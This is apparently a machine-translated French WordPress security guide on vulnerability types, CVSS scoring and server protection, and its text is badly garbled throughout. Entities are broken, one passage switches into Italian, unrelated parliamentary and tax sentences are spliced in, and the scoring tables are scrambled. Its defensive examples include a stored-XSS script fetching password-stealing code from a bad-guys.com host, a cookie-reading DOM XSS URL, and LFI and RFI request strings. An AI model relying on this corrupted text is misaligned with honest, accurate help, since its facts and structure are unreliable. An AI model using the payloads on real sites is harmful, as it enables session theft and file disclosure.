Sécurité WordPress: le Guide ultime

La sécurité de WordPress peut être intimidante, mais pas nécessairement. Dans ce guide complet de sécurité WordPress, nous avons simplifié les bases de la protection des sites WordPress afin que tout non technicien puisse comprendre et protéger ses sites contre les pirates informatiques. Ce guide de sécurité WordPress est divisé en 10 sections faciles à comprendre. Chaque section guidera sur des aspects spécifiques de la sécurité WordPress. À la fin de ce guide, découvrirez les différents types de vulnérabilités, les raisons du piratage et tout sur la façon de protéger les utilisateurs individuels, du serveur au site WordPress.
Plongeons! Section 1 de ce guide: WordPress est il sûr? WordPress est il sûr? En bref, la réponse est oui. WordPress représente près de 40% de tous les sites Internet. L’une des principales raisons de la popularité de WordPress est qu’il s’agit d’une plateforme très sécurisée pour créer tout, des blogs aux grands magasins de commerce électronique. Y a t il des problèmes de sécurité avec wordpress? Bien que WordPress lui même soit sûr, éviter les erreurs de sécurité de WordPress nécessite un peu d’effort de la part du propriétaire du site. En fait, le plus gros problème de sécurité de WordPress est ses utilisateurs. Le propriétaire du site peut éviter la plupart des attaques de piratage WordPress sur la plateforme avec un peu d’effort.
Ne tamp;rsquoinquiète pas, on va te protéger. Ce guide apprendra tout ce dont avez besoin pour protéger votre site Web. Il y a cinq choses que nous devons savoir avant de protéger notre site. Pourquoi les pirates informatiques attaquent ils différents types de sites WordPress pirates informatiques types spécifiques de vulnérabilités WordPress comment empêcher les vulnérabilités WordPress comment déterminer la gravité de la vulnérabilité pourquoi les pirates informatiques devraient ils attaquer mon site Web? C’est un problème de sécurité WordPress commun que pouvez résoudre dans le pire des cas
Je voudrais remercier le Rapporteur pour son excellent rapport. Cela ne signifie toutefois pas que tout le monde le fasse légalement et moralement. Même les plus petits sites Web, les hackers font des profits élevés. Lamp;rsquoargent est tout ce dont ils ont besoin, mais certaines personnes apprécient le sentiment de pouvoir quamp;rsquoelles ont acquis lorsquamp;rsquoelles ont violé avec succès un site Web, mais la grande majorité des gens font des affaires uniquement pour de lamp;rsquoargent. Section 2: Découvrez quelques mythes de sécurité WordPress avant de continuer à lire le reste de ce guide de sécurité WordPress.
Vous trouverez beaucoup de conseils de sécurité WordPress qui circulent sur Internet, de la part de personnes bien intentionnées qui veulent vraiment aider. Malheureusement, certaines de ces astuces sont basées sur le mythe de sécurité de WordPress et n’ajoutent pratiquement aucune sécurité supplémentaire au site WordPress. En effet, certains
La fréquence est mentionnée comme un mythe. Nombre de maux de tête causés par les mythes. Le mythe donne un faux sentiment de sécurité. Vous devriez cacher votre administrateur URL WP ou votre login WP (également connu sous le nom de cache Backend). Lamp;rsquoidée derrière cacher un administrateur Wp est que les pirates informatiques ne peuvent pas déchiffrer ce quamp;rsquoils ne peuvent pas trouver. votre URL de connexion n’est pas une URL WordPress standard WP admin , n’êtes pas vulnérable à la violence? En fait, la plupart des caractéristiques de lamp;rsquoarrière plan caché sont
Et le thème parfait et le numéro de version WordPress. Cependant, il y a des robots sans cerveau qui cherchent sur Internet des vulnérabilités connues dans le Code réel qui fonctionne sur votre site, de sorte que cacher le nom du sujet et le numéro de version WP ne protégera pas. 3. Vous devriez renommer votre répertoire de contenu WP le Répertoire de contenu WP contient vos plug ins, sujets et dossiers de téléchargement de médias. Il y a beaucoup de bonnes choses et de code exécutable dans un répertoire, donc il est compréhensible que les gens veulent prendre lamp;rsquoinitiative de protéger ce dossier. Malheureusement, changer le nom du contenu WP ajoutera une couche de sécurité supplémentaire au site, ce qui est le mythe de sécurité de WordPress. Il ne le fera pas. Nous pouvons facilement trouver le nom du Répertoire de contenu WP modifié en utilisant les outils de développement de navigateur. Dans la capture damp;rsquoécran ci dessous, nous pouvons voir que jamp;rsquoai renommé le Répertoire de contenu de ce site Web en test . Le changement de nom de répertoire namp;rsquoajoute aucune sécurité au site, mais il peut causer des conflits de chemin de répertoire contenu WP plug in codé dur. Mon site n’est pas assez grand pour attirer l’attention des hackers sur ce mythe de sécurité WordPress qui rend de nombreux sites vulnérables aux attaques. Même si possédez un petit site avec peu de trafic, il est essentiel de protéger activement votre site. Même si possédez un petit site avec peu de trafic, il est essentiel de protéger activement votre site. Le fait est que votre site Web ou votre entreprise namp;rsquoa pas besoin damp;rsquoêtre grand pour attirer lamp;rsquoattention damp;rsquoun attaquant potentiel. Les pirates informatiques ont encore la possibilité damp;rsquoutiliser votre site Web comme un moyen de rediriger Certains visiteurs vers des sites malveillants, damp;rsquoenvoyer du spam à partir de serveurs de courrier, de propager des virus et même damp;rsquoextraire B
Votre site Web sera lamp;rsquoun des millions de sites Web les plus visités chaque mois. De nombreux hackers attaquent votre site dans lamp;rsquointention de lamp;rsquoinfecter avec des logiciels malveillants. Les logiciels malveillants sont de petits morceaux de code qui peuvent être utilisés pour apporter des changements malveillants à un site Web. votre site Web est infecté par des logiciels malveillants, il est important damp;rsquoêtre informé dès que possible. Chaque minute quamp;rsquoun logiciel malveillant reste sur votre site, il peut causer plus de dommages à votre site. Plus le site est endommagé, plus il faut de temps pour le nettoyer et le restaurer. Il est essentiel de vérifier la santé du site Web en scannant régulièrement les logiciels malveillants. Camp;rsquoest pourquoi il est essentiel de continuer à vérifier lamp;rsquoétat de santé du site Web en scannant les logiciels malveillants. Un hacker de ransomware pourrait vouloir attaquer votre site Web pour obtenir ransomware. Le ransomware signifie que lorsque le hacker contrôle votre site, il ne sera pas publié à moins que ne payiez des frais élevés. Le temps damp;rsquoarrêt moyen pour les attaques de ransomware est de 9,5 jours. Combien cela coûtera t il de ne pas vendre pendant 10 jours? La rançon moyenne demandée par les pirates informatiques a fortement augmenté, passant de 294 $en 2015 à plus de 13 000 $en 2020. Grâce à ce mode de paiement, la criminalité en ligne namp;rsquoa pas ralenti. Au fur et à mesure que ces communautés criminelles se développent, il devient de plus en plus important de protéger et de protéger adéquatement votre site Web. 4. te corrompu certains hackers peuvent attaquer votre site pour le plaisir. Un piratage qui namp;rsquoest pas si diabolique par nature est un site de diffamation. Ce sont généralement des enfants ou des jeunes qui commencent tout juste à jouer au piratage. Ils lamp;rsquoont fait pour
Un hacker peut être utilisé pour effectuer des entrées malveillantes. Gardez à lamp;rsquoesprit que les hackers Web sont presque toujours automatisés. Pour cette raison, les hackers peuvent facilement accéder à un grand nombre de sites Web, presque en un clin damp;rsquooeil. Les hackers utilisent des outils spéciaux pour scanner les vulnérabilités connues sur Internet. Les hackers aiment les cibles faciles à attaquer, et avoir un site Web avec un logiciel qui exécute des vulnérabilités connues est comme donner aux hackers des instructions étape par étape pour accéder à votre site WordPress, serveur, ordinateur ou tout autre appareil connecté à Internet. Notre rapport mensuel de collecte des vulnérabilités WordPress couvre toutes les vulnérabilités dans WordPress Core, les plug ins WordPress et les sujets de divulgation publique. Dans ces collections, nous partageons le nom du plug in ou du sujet de vulnérabilité, la version touchée et le type de vulnérabilité. Quamp;rsquoest ce quamp;rsquoune vulnérabilité de jour zéro? Une vulnérabilité de jour zéro est une vulnérabilité qui est divulguée publiquement avant quamp;rsquoun développeur ne publie un correctif de vulnérabilité. En parlant de sécurité WordPress, il est important de comprendre la définition de la vulnérabilité de jour zéro. Comme la vulnérabilité a été divulguée au public, les développeurs namp;rsquoont pas eu le temps de la corriger. Cela a une grande influence sur votre plug in et votre thème. Souvent, les chercheurs en sécurité découvrent les vulnérabilités et les divulguent en privé aux développeurs de lamp;rsquoentreprise qui possèdent le logiciel. Les chercheurs et les développeurs en sécurité conviennent que des détails complets seront publiés dès que le correctif sera disponible. Après la publication du correctif, la divulgation de la vulnérabilité peut être légèrement retardée afin de donner à un plus grand nombre de personnes le temps de mettre à jour les principales vulnérabilités en matière de sécurité. Cependant, si le développeur ne répond pas au chercheur
En ce qui concerne la sécurité ou lamp;rsquoabsence de correctifs de vulnérabilité, les chercheurs peuvent divulguer publiquement des vulnérabilités afin de faire pression sur les développeurs pour quamp;rsquoils publient des correctifs. La divulgation publique des vulnérabilités et lamp;rsquointroduction apparente damp;rsquoune journée zéro pourraient être contre productives. Mais camp;rsquoest le seul moyen pour les chercheurs de faire pression sur les développeurs pour quamp;rsquoils corrigent les bogues. Le projet zéro de Google a des lignes directrices similaires pour lamp;rsquoexposition aux vulnérabilités. Ils ont publié tous les détails de la fuite 90 jours plus tard. la vulnérabilité a été corrigée. Namp;rsquoimporte qui peut le découvrir. un hacker découvre une vulnérabilité avant que le développeur ne publie le correctif, ce sera le pire cauchemar de lamp;rsquoutilisateur final Zéro jour utilisé activement. Quamp;rsquoest ce quamp;rsquoune vulnérabilité de jour zéro activement exploitée? Une vulnérabilité de jour zéro activement exploitée est ce à quoi elle ressemble. Il samp;rsquoagit damp;rsquoune vulnérabilité non corrigée que les pirates informatiques peuvent cibler, exploiter et exploiter activement. À la fin de 2018, les pirates informatiques exploitent activement de graves vulnérabilités WordPress dans le plug in de conformité WP gdpr. Cette vulnérabilité permet aux utilisateurs non autorisés de modifier les paramètres damp;rsquoinscription des utilisateurs du WP et de changer le nouveau rôle damp;rsquoutilisateur par défaut de lamp;rsquoabonné à lamp;rsquoAdministrateur, comme décrit dans la section suivante. Ces hackers ont découvert cette vulnérabilité avant le plug in de conformité WP gdpr et les chercheurs en sécurité. Par conséquent, tout site Web qui a installé le plugin est une marque de commerce simple et garantie pour les cybercriminels. La meilleure façon de se protéger contre une vulnérabilité de jour zéro la meilleure façon de protéger un site Web contre une vulnérabilité de jour zéro est de désactiver et de supprimer le logiciel jusquamp;rsquoà ce que la vulnérabilité soit corrigée. Heureusement, les développeurs du plug in de conformité WP gdpr ont
Le lendemain de sa divulgation, il a rapidement publié un correctif pour cette vulnérabilité. Une vulnérabilité sans correctif rend votre site facile à cibler par des pirates informatiques. Vulnérabilité WordPress non validée et validée lorsque parlez de vulnérabilité WordPress, devez également comprendre deux autres termes. Non authentifié: une vulnérabilité WordPress non authentifiée signifie que n’importe qui peut l’exploiter. Vérifié: une vulnérabilité WordPress validée signifie qu’un utilisateur connecté est nécessaire pour exploiter cette vulnérabilité. Il est difficile pour un hacker damp;rsquoexploiter une vulnérabilité qui nécessite un utilisateur authentifié, en particulier une vulnérabilité qui nécessite des privilèges damp;rsquoadministrateur. De plus, si un hacker possède déjà un ensemble damp;rsquoidentifiants damp;rsquoadministrateur, il namp;rsquoa pas vraiment besoin damp;rsquoexploiter la vulnérabilité pour créer de la confusion. Il y a un avertissement. Certaines vulnérabilités authentifiées namp;rsquoont besoin que damp;rsquoexploiter la fonctionnalité au niveau de lamp;rsquoabonné. votre site permet à quelquamp;rsquoun de samp;rsquoinscrire, il namp;rsquoy a pas beaucoup de différence entre cette vulnérabilité et une vulnérabilité non vérifiée. En parlant de vulnérabilité WordPress, il y a 21 types communs de vulnérabilité. Nous avons introduit chaque type de vulnérabilité WordPress. La vulnérabilité de contournement damp;rsquoauthentification permet à un attaquant de contourner les exigences damp;rsquoauthentification et damp;rsquoexécuter des tâches qui sont généralement réservées aux utilisateurs authentifiés. Lamp;rsquoauthentification est le processus damp;rsquoauthentification de lamp;rsquoutilisateur. WordPress exige des utilisateurs qu’ils saisissent un nom d’utilisateur et un mot de passe pour s’authentifier. Contournement de lamp;rsquoauthentification lamp;rsquoexemple damp;rsquoapplication valide lamp;rsquoauthentification en fonction damp;rsquoun ensemble fixe de paramètres. Un attaquant peut modifier ces paramètres pour accéder à ce qui est normalement nécessaire
Les scripts croisés réfléchissants se produisent lorsquamp;rsquoun script malveillant est envoyé au serveur dans une demande du client (une demande de lamp;rsquoutilisateur dans le navigateur), réfléchi par le serveur et exécuté par le navigateur. Supposons que votre favesite soit un exemple de réflexion de script inter site. Com demande lamp;rsquoaccès à certains contenus du site. Supposons que ce site namp;rsquoencode pas correctement lamp;rsquoentrée de lamp;rsquoutilisateur. Un attaquant peut exploiter cette vulnérabilité en créant un lien malveillant et en le partageant avec un utilisateur de votre site. Courriels et messages sur les médias sociaux. Je suis ton préféré. Lamp;rsquooutil com Cool attaqué utilise lamp;rsquooutil de raccourcissement damp;rsquoURL pour rendre les liens malveillants non menaçants et très cliquables, yourfavesite. Com cool things. Cependant, lorsque cliquez sur le lien raccourci, le lien complet samp;rsquoexécute à partir de votre navigateur de site. Com cool things? Q = quelque chose de cool Liens Une vulnérabilité de script xss stockée ou inter site stockée permet à un hacker damp;rsquoinjecter du Code malveillant et de le stocker sur un serveur damp;rsquoapplication Web. Exemple de script inter site archivé un attaquant a trouvé votre site. Com permet aux visiteurs damp;rsquointégrer des balises HTML dans la section commentaires du site. Puis lamp;rsquoattaquant a créé un nouveau commentaire: excellent article! Voir un autre grand article . amp;ltscriptamp;ampsrc=”http:bad-guys.compasswordstealingcode.js . Dopo aver fatto clic sul collegamento, verrai indirizzato a yourfavesite.com e lo script dannoso verrà riflesso nel tuo browser, consentendo yourfavesite.com di dirottare i cookie di sessione e yourfavesite.com account yourfavesite.com . Come prevenire lo scripting cross-site riflesso La regola n. 5 sul cheat sheet di prevenzione cross-scripting di OWASP è la codifica dellamp;039URL prima di inserire dati non attendibili nei valori dei parametri URL HTML. Questa regola può aiutare a prevenire la creazione di una vulnerabilità XSS riflessa quando si aggiungono dati non attendibili nel valore del parametro HTTP GET. Remarque: la vulnérabilité xss reflétée invite les visiteurs à cliquer sur le lien de code malveillant pour lamp;rsquoexécuter. Les attaques xss stockées namp;rsquoont besoin que damp;rsquoaccéder aux pages qui contiennent des commentaires. Le Code malveillant est exécuté chaque fois que la page est chargée. Maintenant que notre voyou a ajouté ce commentaire, tous les futurs visiteurs de cette page seront exposés à ses scripts malveillants. Le script est hébergé sur le site Web de lamp;rsquoattaquant et peut détourner C
Basé sur Dom en envoyant lamp;rsquoURL suivante au nouvel utilisateur: http:yourfavesite.comaccount?name= Alertes (document.cookie) Lorsque le nouvel utilisateur clique sur le lien, le navigateur envoie une demande: Account? Nom = Alertes (document.cookie) Un méchant. Com. Le site répondra en utilisant la page contenant le code JavaScript ci dessus. Le navigateur du nouvel utilisateur crée un objet Dom pour la page qui contient des objets de document. Lamp;emplacement contient une chaîne: http:www.bad-guys.comaccount?name= Alertes (document.cookie)
Le code original sur la page ne veut pas que les paramètres par défaut contiennent des balises HTML, mais plutôt des balises sur la page de réponse. Le navigateur du nouvel utilisateur rendra ensuite la page et exécutera le script de lamp;rsquoattaquant: Alert (document.cookie) How to Prevent Dom Based Cross site scripting Preventing Cheat Sheet Rule 1 est HTML Escape. JS samp;rsquoéchappe ensuite avant damp;rsquoajouter des données non fiables au sous contexte HTML dans le contexte damp;rsquoexécution. Exemple de méthode HTML dangereuse: attributs damp;rsquoélément. InnerHTML =
Période Exemples d’escalade des privilèges dans notre résumé de vulnérabilité WordPress de novembre 2020, nous signalons une vulnérabilité d’escalade des privilèges trouvée dans le plug in membre final (qui a été corrigé dans la version 2.1.12). Un attaquant peut fournir des paramètres de tableau pour les éléments utilisateurs de la capacité wp u qui définissent le rôle de lamp;rsquoutilisateur. Au cours du processus damp;rsquoinscription, les détails damp;rsquoinscription soumis sont transmis à la fonction Update _ profile et toutes les métadonnées soumises, peu importe ce qui est envoyé, sont mises à jour pour les utilisateurs nouvellement enregistrés. Cette vulnérabilité permet essentiellement aux nouveaux utilisateurs de demander à un administrateur pendant leur inscription. Comment empêcher la mise à jour des permissions ithemes Security pro peut aider à protéger votre site contre les contrôles damp;rsquoaccès corrompus en limitant lamp;rsquoaccès des administrateurs à la liste des périphériques de confiance. Vulnérabilité damp;rsquoexécution de code à distance RCE ou vulnérabilité damp;rsquoexécution de code à distance permet à un attaquant damp;rsquoaccéder et de modifier, voire de contrôler un ordinateur ou un serveur. Exemple damp;rsquoexécution de code à distance en 2018, Microsoft a découvert une vulnérabilité damp;rsquoexécution de code à distance dans Excel. En exploitant avec succès cette vulnérabilité, un attaquant peut exécuter du Code arbitraire dans le contexte de lamp;rsquoutilisateur actuel. lamp;rsquoutilisateur actuel est connecté avec des privilèges damp;rsquoutilisateur administratifs, un attaquant peut prendre le contrôle du système affecté. Lamp;rsquoattaquant peut alors installer le programme Afficher, modifier ou supprimer des données Ou créer un nouveau compte avec des privilèges damp;rsquoutilisateur complets. Les utilisateurs dont les comptes sont configurés pour avoir moins de privilèges damp;rsquoutilisateur sur le système peuvent être moins touchés que les utilisateurs suivants:
La Commission a également adopté une proposition de directive qui est à peu près identique à la législation des États Membres en matière de taxes sur le chiffre damp;rsquoaffaires. La façon la plus simple damp;rsquoéviter lamp;rsquoexécution de code à distance pour atténuer la vulnérabilité RCE est de valider lamp;rsquoentrée de lamp;rsquoutilisateur en filtrant et en supprimant les caractères indésirables. Notre société mère, Liquid Web, a un article sur la prévention de lamp;rsquoexécution de code à distance. Vulnérabilité à lamp;rsquoinclusion de fichiers une vulnérabilité à lamp;rsquoinclusion de fichiers se produit lorsquamp;rsquoune application Web permet à un utilisateur damp;rsquoenvoyer des entrées à un fichier ou de un fichier sur un serveur. Il existe deux types de fichiers qui contiennent des vulnérabilités, locales et distantes. Vulnérabilité damp;rsquoinclusion de fichiers locaux LFI ou vulnérabilité damp;rsquoinclusion de fichiers locaux permet à un attaquant de lire et parfois damp;rsquoexécuter des fichiers sur un serveur de site Web. Un exemple damp;rsquoinclusion damp;rsquoun fichier local nous amène à votre site Web. Com, où le chemin passé à lamp;rsquoinstruction contenant namp;rsquoest pas nettoyé correctement. Par exemple, regardons lamp;rsquoURL ci dessous. Yourfavesite. Com module. Php? Fichier = exemple. Un attaquant de fichier peut modifier les paramètres damp;rsquoURL pour accéder à des fichiers arbitraires sur le serveur. Yourfavesite. Com module. Php? File = etc passwd changer la valeur du fichier dans lamp;rsquoURL pourrait permettre à un attaquant de voir le contenu du fichier psswd. Comment empêcher lamp;rsquoinclusion damp;rsquoune liste de fichiers autorisés que la page de création de fichiers locaux peut contenir, puis utiliser un identificateur pour accéder au fichier sélectionné. Toute demande contenant un identificateur invalide est ensuite bloquée. Vulnérabilité damp;rsquoinclusion de fichiers distants RFI ou vulnérabilité damp;rsquoinclusion de fichiers distants permet à un attaquant damp;rsquoinclure des fichiers, généralement en exploitant le mécanisme damp;rsquoinclusion de fichiers dynamiques mis en œuvre dans lamp;rsquoapplication cible. Fichiers distants avec spritz désactivés dans le dépôt contenant des exemples de plug ins WP WordPress
Tolly Word Press. Org, parce quamp;rsquoil a une vulnérabilité RFI. Voici le code source de la vulnérabilité: if (isset ($u Get [amp;lsquoURL]) {$content = File _ get Contents ($u Get [amp;lsquo URL]) pouvez lamp;rsquoexploiter en modifiant la valeur de content.filter.php? Url = value. Exemple: yoursite.com WP content plugins WP with spritz wp.spritz.content.filter.php? Url = http Http: Bad gues. Empêche com exec qui contient des fichiers distants de créer une liste de fichiers autorisés que la page peut contenir, puis damp;rsquoaccéder au fichier sélectionné en utilisant un identificateur. Toute demande contenant un identificateur invalide est ensuite bloquée. Une vulnérabilité de traversée de répertoire ou de fichier permet à un attaquant de lire des fichiers arbitraires sur le serveur exécutant lamp;rsquoapplication. Échantillons croisés de répertoires les versions 5.7 à 5.03 de WordPress sont vulnérables aux attaques croisées de répertoires parce qu’elles ne valident pas correctement les données d’entrée de l’utilisateur. Un attaquant accédant à un compte avec au moins les privilèges damp;rsquoauteur peut exploiter une vulnérabilité de traversée de répertoire et exécuter du Code PHP malveillant sur le serveur sous jacent pour une capture à distance complète. Comment empêcher les développeurs croisés de répertoires damp;rsquoutiliser des index au lieu de la partie réelle du nom de fichier lors de la création de modèles ou damp;rsquoutiliser des fichiers de langue. Vulnérabilité de redirection malveillante une vulnérabilité de redirection malveillante permet à un attaquant damp;rsquoinjecter du Code pour rediriger un visiteur de site Web vers un autre site Web. Lamp;rsquoexemple de redirection malveillante suppose que êtes à la recherche damp;rsquoun pull bleu dans une boutique en ligne à lamp;rsquoaide damp;rsquoun outil de recherche. Malheureusement, le serveur boutique ne peut pas encoder correctement lamp;rsquoentrée de lamp;rsquoutilisateur et
Octets sec. Il existe deux façons principales de prévenir les attaques par déni de service et damp;rsquoatténuer les attaques dos. Achetez plus damp;rsquohôtes que namp;rsquoen avez besoin. Avoir des ressources supplémentaires peut aider à surmonter la croissance de la demande causée par les attaques dos. Utilisez un pare feu au niveau du serveur, comme cloudflare. Un pare feu peut détecter des pointes anormales de trafic et empêcher la surcharge du site. Enregistrement des touches lamp;rsquoenregistrement des touches est également appelé enregistrement du clavier ou acquisition du clavier. Lamp;rsquoenregistrement des touches se produit lorsque le hacker surveille et enregistre secrètement les touches pressées par les visiteurs du site. Exemple damp;rsquoenregistrement de keysequence en 2017, un hacker a installé avec succès un JavaScript malveillant sur le serveur du fabricant de smartphones oneplus. Un attaquant utilise du Code malveillant pour surveiller et enregistrer les clés du client oneplus lorsquamp;rsquoil entre les détails de la carte de crédit. Avant quamp;rsquooneplus ne détecte et répare les attaques de pirates informatiques, les pirates informatiques ont enregistré et recueilli des informations clés sur 40 000 clients. Comment empêcher la mise à jour complète de lamp;rsquoenregistrement de la chaîne de clés! En général, un attaquant doit utiliser une autre vulnérabilité existante pour insérer un enregistreur de clavier dans un ordinateur ou un serveur. La mise à jour de tout le contenu avec les derniers correctifs de sécurité évitera de donner aux pirates un moyen facile damp;rsquoinstaller un Keylogger sur votre site Web ou votre ordinateur. Avantage: la vulnérabilité du logiciel damp;rsquoHameçonnage est la seule vulnérabilité que les pirates informatiques et les cybercriminels tentent damp;rsquoexploiter. Les hackers ciblent également les humains et les utilisent pour attaquer. Une utilisation courante est lamp;rsquohameçonnage. Quamp;rsquoest ce que lamp;rsquohameçonnage? Lamp;rsquohameçonnage est une méthode damp;rsquoattaque en ligne qui utilise le courriel, les médias sociaux, les messages texte et le téléphone pour tromper les victimes en leur fournissant des renseignements personnels. Lamp;rsquoattaquant utilisera ensuite ces informations pour accéder à un compte personnel ou
Fraude à lamp;rsquoidentité. Comment détecter les courriels damp;rsquohameçonnage comme nous lamp;rsquoavons vu précédemment dans certaines vulnérabilités nécessitent un certain type damp;rsquointeraction utilisateur pour être exploitées. Une façon pour les hackers damp;rsquoattirer les gens dans leurs activités maléfiques est damp;rsquoenvoyer des e mails damp;rsquohameçonnage. Apprenez à identifier les courriels damp;rsquohameçonnage pour éviter de participer involontairement à des programmes de cybercriminels. 4 conseils pour détecter les courriels damp;rsquohameçonnage: voir lamp;rsquoadresse électronique de lamp;rsquoexpéditeur: recevez un courriel damp;rsquoune entreprise, la partie de lamp;rsquoadresse électronique de lamp;rsquoexpéditeur qui suit « @ » doit correspondre au nom de lamp;rsquoentreprise. un courriel représente une entreprise ou une entité gouvernementale, mais utilise une adresse électronique publique comme « @ gmail », il samp;rsquoagit damp;rsquoun courriel damp;rsquohameçonnage. Notez les petites erreurs damp;rsquoorthographe dans le nom de domaine. Par exemple, regardons cette adresse e mail [protégée par e mail] et nous pouvons voir que Netflix a un
Déterminer lamp;rsquoutilisateur en fonction de la nécessité damp;rsquoexploiter lamp;rsquointeraction utilisateur pour la vulnérabilité. lamp;rsquointeraction utilisateur namp;rsquoest pas nécessaire pour permettre à un attaquant damp;rsquoexploiter la vulnérabilité, elle est plus élevée.
Description des exigences en matière damp;rsquointeraction utilisateur No (n) Les systèmes vulnérables peuvent être exploités sans aucune interaction utilisateur. Demande Pour exploiter correctement cette vulnérabilité, lamp;rsquoutilisateur doit prendre certaines mesures avant de lamp;rsquoexploiter, par exemple en le persuadant de cliquer sur un lien dans un courriel. 1.1.5. Les scores de portée sont basés sur les vulnérabilités des composants logiciels qui ont une incidence sur les ressources en dehors de leur portée de sécurité. La portée de la sécurité comprend damp;rsquoautres composants qui ne fournissent que des fonctions à ce composant, même samp;rsquoils ont leurs propres permissions de sécurité. Les scores sont plus élevés lorsque la plage change. Description de lamp;rsquoutilisation Pas de changement Les vulnérabilités exploitées ne peuvent affecter que les ressources gérées par la même institution. Dans ce cas, les parties vulnérables et touchées coïncident. amp;lt!DOCTYPE foo [ Modifié

La vulnérabilité exploitée peut affecter des ressources qui dépassent les permissions damp;rsquoautorisation fournies par le composant vulnérable. Dans ce cas, les composantes vulnérables et touchées sont différentes.

1,2. Indicateurs damp;rsquoimpact les indicateurs damp;rsquoimpact saisissent lamp;rsquoimpact direct damp;rsquoune exploitation réussie. 1.2.1. Impact confidentiel (c) ce score damp;rsquoimpact confidentiel mesure lamp;rsquoimpact sur la vie privée de lamp;rsquoinformation gérée par le logiciel utilisé. Plus la perte du logiciel touché est importante, plus le score est élevé.

Élevé (h)

Faible (l)

No (n)

	Incidence sur la description de la confidentialité
Perte totale de confidentialité, entraînant Divulguer toutes les ressources du logiciel attaqué à lamp;rsquoattaquant.
Une certaine perte de confidentialité. Un attaquant peut accéder à des informations confidentielles.
La confidentialité namp;rsquoest pas perdue dans le logiciel utilisé.			1.2.2. Intégrité (Io) ce score damp;rsquointégrité est basé sur lamp;rsquoimpact damp;rsquoune exploitation réussie sur lamp;rsquointégrité. Plus les conséquences du logiciel touché sont importantes, plus le score est élevé.

Impact sur la description de lamp;rsquointégrité

Élevé (h)

Faible (l)

No (n)

Perte totale damp;rsquointégrité ou perte totale de protection.
La modification des données namp;rsquoaura pas damp;rsquoimpact direct important sur le logiciel touché.

Il namp;rsquoy a pas de perte damp;rsquointégrité dans le logiciel touché.

1.2.3. Disponibilité (A) les scores de disponibilité sont basés sur lamp;rsquoimpact de disponibilité du logiciel développé. Plus les conséquences de la partie touchée sont importantes, plus le score est élevé.

Élevé (h)

Faible (l)

No (n)

	Impact sur la description de la disponibilité
Une perte totale de disponibilité entraîne un déni total damp;rsquoaccès aux ressources du logiciel attaqué.
Réduction du rendement ou interruption de la disponibilité des ressources.

Il namp;rsquoy a pas damp;rsquoimpact sur la disponibilité des logiciels touchés.

Calcul de la fraction de base de la fraction cvss la fraction de base est fonction des équations dans les sous points damp;rsquoinfluence et de développement. Où la note de base est définie comme si

Non défini

Élevé (h)

	Valeur damp;rsquoexpiration décrite par Code
Lamp;rsquoattribution de cette valeur à une mesure namp;rsquoaffecte pas les scores. Camp;rsquoest un signal que la formule de notation saute cet indicateur.

Il existe un code de fonction distinct ou aucune exploitation namp;rsquoest nécessaire, et les détails sont largement disponibles.
Ou optimiser la notation environnementale en fonction de lamp;rsquoenvironnement de lamp;rsquoutilisateur.

Valeur descriptive de la Sous fraction damp;rsquoinfluence

	Non défini (CR: x)		La perte (confidentialité intégrité disponibilité) peut avoir un impact limité sur lamp;rsquoOrganisation.
	Faible (CR: l)		Le risque de perte (confidentialité intégrité disponibilité) a de graves répercussions sur lamp;rsquoOrganisation.

Moyen (CR: m)

La perte (confidentialité intégrité disponibilité) peut avoir des effets désastreux sur lamp;rsquoOrganisation.

Camp;rsquoest un signal qui ignore ce score.

Cvss fraction Gravity

			Élevé (CR: h)
		Calcul des scores cvss environnementaux les scores environnementaux sont définis comme si (score damp;rsquoimpact modifié)
	0		Il namp;rsquoy en a pas.

0,1 – 3,9

Faible

Moyenne

Haut

			4,0 – 6,9
			7,0 – 8,9
			9,0 – 10,0

Critique

Exemple damp;rsquoévaluation de la gravité des cvss dans le monde réel dans notre résumé de vulnérabilité de décembre 2020, nous avons signalé une vulnérabilité dans le plug in SMTP Easy WP. La vulnérabilité de jour zéro (dont nous discuterons dans la section suivante) permet à un attaquant de contrôler un compte administrateur et est largement exploitée. En regardant les entrées de la base de données nationale sur les vulnérabilités, nous pouvons découvrir la gravité de la vulnérabilité SMTP du WP.

Analysons quelques choses à partir des captures damp;rsquoécran de la nvdb SMTP WP ci dessus. Note de base: la note de base est de 7,5, ce qui indique un niveau élevé de gravité de la vulnérabilité. Vecteurs: les vecteurs nous disent que les scores sont basés sur lamp;rsquoéquation de vulnérabilité cvss 3.1 et les indicateurs utilisés pour calculer les scores. Camp;rsquoest la partie métrique du vecteur. Av: N AC: L PR: N ui: N S: U C: H I: N A: n maintenant, dans nous utilisons les valeurs et les descriptions des mesures de base précédentes pour comprendre les huit valeurs des mesures vectorielles. Av: N – cela signifie le vecteur damp;rsquoattaque de vulnérabilité (av)
Réticulum Comprendre comment un attaquant tente damp;rsquoenvahir notre site Web et ses cibles après avoir violé notre site Web peut nous aider à établir une défense appropriée. Dans la section suivante, apprendrez comment protéger votre site contre presque tous les types damp;rsquoattaques que les pirates informatiques peuvent lancer. Section 4: protéger votre serveur la première étape de la politique de sécurité WordPress est de protéger votre serveur. Le serveur stocke tous les fichiers et le Code qui font fonctionner le site. Dans cette section, apprendrez lamp;rsquoimportance de choisir un bon animateur. Comment chiffrer les communications sur un site Web. Comment un pare feu peut aider à protéger votre site. Tous les hôtes Web ne sont pas les mêmes et à long terme, le choix d’un seul hôte en fonction du prix peut entraîner des coûts supplémentaires pour les problèmes de sécurité WordPress. La plupart des environnements gérés partagés sont sécurisés, mais certains ne séparent pas correctement les comptes utilisateurs. Votre hôte doit être vigilant lors de l’application des derniers correctifs de sécurité et suivre d’autres bonnes pratiques de sécurité WordPress importantes liées à la sécurité des serveurs et des fichiers. Votre hôte devrait être attentif à lamp;rsquoapplication des derniers correctifs de sécurité et suivre damp;rsquoautres pratiques exemplaires importantes en matière de sécurité de lamp;rsquohôte liées à la sécurité des serveurs et des fichiers. Le chiffrement des sites WordPress à l’aide de la couche SSL Secure Sockets (également appelée SSL) est une technique de sécurité qui assure le chiffrement entre le client et le serveur Web. Plus simplement, un « client » est un navigateur Web comme chrome ou Safari, et un « serveur Web » est votre site Web ou votre boutique en ligne. Une façon simple de savoir si le site Web que visitez a un certificat SSL installé est de voir la barre damp;rsquoadresse de votre navigateur pour voir si lamp;rsquoURL commence par http ou HTTPS. lamp;rsquoURL commence par HTTPS, pouvez naviguer en toute sécurité sur des sites Web utiles
